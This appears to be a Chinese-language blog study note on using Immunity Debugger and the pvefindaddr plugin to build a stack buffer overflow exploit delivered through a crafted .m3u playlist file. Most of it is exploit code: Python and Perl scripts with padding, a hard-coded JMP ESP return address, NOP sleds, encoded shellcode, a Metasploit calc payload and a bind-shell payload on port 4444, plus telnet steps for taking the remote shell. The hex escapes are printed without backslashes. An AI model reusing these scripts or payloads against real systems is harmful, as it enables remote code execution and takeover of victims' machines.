ImmunityDebugger 学习

 Immunity  Debugger软件专门用于加速漏洞利用程序的开发，辅助漏洞挖掘以
及恶意软件分析。它具备一个完整的图形用户界面，同时还配备了迄今为止最为
强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融
合于一体，它还附带了一套高度可定制的纯python图形算法，可用于帮助我们绘
制出直观的函数体控制流以及函数中的各个基本块。

另外   windbg -I   (大写I可以设置即时调试器)

只是学习记录，别无他意·············各种转载请见谅·······················

学习安装：  http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install

用法：   http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage

下载   pvefindaddr.py   放入   Immunity Debugger v1.8.3PyCommands 目录下   在命令行中即可使用

下面以一个实例来学习怎么用·························

pvefindaddr pattern_create 6000  

等下你就可以看到提示"check mspttern.txt",到Immunity Debugger 目录下打开mspatters.txt 中的 字串,拷贝模板到我们的漏洞利用代码中并重新生成，然后加载到immunitydebugger中运行包含模板的恶意文档。

pvefindaddr findmsp 自动化分析，各种分析，如果可以就可以得到出错的地址和覆盖到的SEH

官方：  
此功能将尝试找到一个所谓的循环模式（又名Metasploit的图案）在存储器中的开始，并且也将尝试找到的偏移量的循环模式，由寄存器参考的，偏移到一个寄存器中，或在堆栈。
除了 ​​这个，findmsp也将尝试猜测偏移到A的长字符串的开头。
不需要参数，所有的输出写入到日志窗口。

可以看到链异常和异常地址

当然也可以用 windbg 加载    当然也会看到出现 异常，查看异常：

都会看到   异常链地址   47356f47 

接着我们查看  是多少个字节造成的：

pattern_offset。功能将尝试找到在一个循环模式4字节给出的确切位置
这个函数需要一个参数：4个字节来定位。这4个字节可以是4个字符或4个字节。在这两种情况下，没有空格应的字符或字节之间插入。
即使已颠倒的4个字节的顺序，则程序将仍然能够定位的精确位置上，从环状图案的开头开始。

语法：pattern_offset <4字节>

输出被写入只日志窗口。

看到是   5115 为  异常的链地址

接着  就有指令可以自动给出解决方法：

DEP参考 ： http://blog.csdn.net/zcc1414/article/details/11709405

本文学习参考 ：  

http://bbs.pediy.com/showthread.php?t=130748&highlight=pvefindaddr

下面用 exploits 编写系列之一 来学习

首先  这个程序 如果直接用  !pvefindaddr pattern_create xxxxx  去创建一个测试文件的话会不成功的！！！！！

因为程序可能有检查什么的什么的·········································比如 过滤文件名和路径中不被允许的字符 直接弹框而不是直接崩溃

Python脚本：  

PS：  看来PYTHON脚本很有用啊，加快学习啊！！！

1  首先测试  'x41'个数，它不会直接弹框，可以看到EIP被赋值为 x41

大概弄个数去测试再加上 !pvefindaddr pattern_create 生成的字符串 就可以去测试多少  (注意不能直接上检测字符串  因为程序有检查  以后注意)

junk = 'x41'*26000
junk2 = ('Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B')
exploit = junk+junk2

try:
  file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
  file.write(exploit)
  file.close()
  print 'File created, time to PEW PEW!
'
except:
  print 'Something went wrong!
'
  print 'Check if you have permisions to write in that folder, of if the folder exists!'

可以看到ESP 上有我们的检测字符串    所以就可以  自动化检测室多少字节搞的EIP    

那么  pattern_offset 指定的参数为  我们输入的检测字符串  发现时第75个造成的

接着来：

  #!/usr/bin/python

junk = 'x41'*(26075)
eip = 'x11'*4
nop = 'x90'*20
prejunk = 'x42'*700


exploit = junk+eip+nop+prejunk

try:
  file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
  file.write(exploit)
  file.close()
  print 'File created, time to PEW PEW!
'
except:
  print 'Something went wrong!
'
  print 'Check if you have permisions to write in that folder, of if the folder exists!'

不出所料，EIP被赋值为了x11 * 4 了

但是后面还是又有问题！！！

因为EIP后面的 x90 没有我们指定的20个  那么其中猜测被NOP掉了几个

现在才来构造shellcode:

发现程序在WINDBG中搜到的 JMP ESP 和OD 中的地址不一致，程序有重定位DLL

  #!/usr/bin/python

junk = 'x41'*(26075)
jmpesp = 'xd7x93xd3x7d'
#7DD393D7

nop = 'x90'*25
shellcode = ('xD9xEE'         
'xD9x74x24xF4'   
'x58'              
'x83xC0x1b'   
'x33xC9'        
'x8Ax1Cx08'     
'x80xF3x11'		
'x88x1Cx08'    
'x41'           
'x80xFBx90' 
'x75xF1'
'xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d'
'x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42'
'x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a'
'x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84'
'xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48'
'x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b'
'xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64'
'xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12'
'x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca'
'x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41'
'x42xeex46xedx42xeex46xe9x81')


exploit = junk+jmpesp+nop+shellcode

try:
  file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
  file.write(exploit)
  file.close()
  print 'File created, time to PEW PEW!
'
except:
  print 'Something went wrong!
'
  print 'Check if you have permisions to write in that folder, of if the folder exists!'

最后成功：

再学习下 Perl脚本：

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc
my $file = "test.m3u";
my $junk = "x41"x 26075;#7DD393D7
my $jmpesp = pack('V',0x7DD393D7);
my $nop = "x90"x 25;
my $buf = 
"xbax9dxaex2fx1cxdbxc5x31xc9xd9x74x24xf4x5b" .
"xb1x32x31x53x12x83xc3x04x03xcexa0xcdxe9x0c" .
"x54x98x12xecxa5xfbx9bx09x94x29xffx5ax85xfd" .
"x8bx0ex26x75xd9xbaxbdxfbxf6xcdx76xb1x20xe0" .
"x87x77xedxaex44x19x91xacx98xf9xa8x7fxedxf8" .
"xedx9dx1exa8xa6xeax8dx5dxc2xaex0dx5fx04xa5" .
"x2ex27x21x79xdax9dx28xa9x73xa9x63x51xffxf5" .
"x53x60x2cxe6xa8x2bx59xddx5bxaax8bx2fxa3x9d" .
"xf3xfcx9ax12xfexfdxdbx94xe1x8bx17xe7x9cx8b" .
"xe3x9ax7ax19xf6x3cx08xb9xd2xbdxddx5cx90xb1" .
"xaax2bxfexd5x2dxffx74xe1xa6xfex5ax60xfcx24" .
"x7fx29xa6x45x26x97x09x79x38x7fxf5xdfx32x6d" .
"xe2x66x19xfbxf5xebx27x42xf5xf3x27xe4x9exc2" .
"xacx6bxd8xdax66xc8x16x91x2bx78xbfx7cxbex39" .
"xa2x7ex14x7dxdbxfcx9dxfdx18x1cxd4xf8x65x9a" .
"x04x70xf5x4fx2bx27xf6x45x48xa6x64x05x8f";

open($FILE,">$file");
print $FILE $junk.$jmpesp.$nop.$buf;
close($FILE);

反弹shell

攻击者再在 CMD中  telnet 被攻击者IP  端口号

得到shell

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc
my $file = "test.m3u";
my $junk = "x41"x 26075;#7DD393D7
my $jmpesp = pack('V',0x7DD393D7);
my $nop = "x90"x 25;

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=192.168.198.1, EXITFUNC=process, 
# InitialAutoRunScript=, AutoRunScript=
my $buf = 
"x31xc9xb1x56xb8x28x2dx92x06xd9xcbxd9x74x24" .
"xf4x5ax31x42x0fx03x42x0fx83xc2x2cxcfx67xfa" .
"xc4x86x88x03x14xf9x01xe6x25x2bx75x62x17xfb" .
"xfdx26x9bx70x53xd3x28xf4x7cxd4x99xb3x5axdb" .
"x1ax72x63xb7xd8x14x1fxcax0cxf7x1ex05x41xf6" .
"x67x78xa9xaax30xf6x1bx5bx34x4axa7x5ax9axc0" .
"x97x24x9fx17x63x9fx9ex47xdbx94xe9x7fx50xf2" .
"xc9x7exb5xe0x36xc8xb2xd3xcdxcbx12x2ax2dxfa" .
"x5axe1x10x32x57xfbx55xf5x87x8exadx05x3ax89" .
"x75x77xe0x1cx68xdfx63x86x48xe1xa0x51x1axed" .
"x0dx15x44xf2x90xfaxfex0ex19xfdxd0x86x59xda" .
"xf4xc3x3ax43xacxa9xedx7cxaex16x52xd9xa4xb5" .
"x87x5bxe7xd1x64x56x18x22xe2xe1x6bx10xadx59" .
"xe4x18x26x44xf3x5fx1dx30x6bx9ex9dx41xa5x65" .
"xc9x11xddx4cx71xfax1dx70xa4xadx4dxdex16x0e" .
"x3ex9exc6xe6x54x11x39x16x57xfbx4cx10x99xdf" .
"x1dxf7xd8xdfxb0x5bx54x39xd8x73x30x91x74xb6" .
"x67x2axe3xc9x4dx06xbcx5dxd9x40x7ax61xdax46" .
"x29xcex72x01xb9x1cx47x30xbex08xefx3bx87xdb" .
"x65x52x4ax7dx79x7fx3cx1exe8xe4xbcx69x11xb3" .
"xebx3exe7xcax79xd3x5ex65x9fx2ex06x4ex1bxf5" .
"xfbx51xa2x78x47x76xb4x44x48x32xe0x18x1fxec" .
"x5exdfxc9x5ex08x89xa6x08xdcx4cx85x8ax9ax50" .
"xc0x7cx42xe0xbdx38x7dxcdx29xcdx06x33xcax32" .
"xddxf7xfax78x7fx51x93x24xeaxe3xfexd6xc1x20" .
"x07x55xe3xd8xfcx45x86xddxb9xc1x7bxacxd2xa7" .
"x7bx03xd2xed";

open($FILE,">$file");
print $FILE $junk.$jmpesp.$nop.$buf;
close($FILE);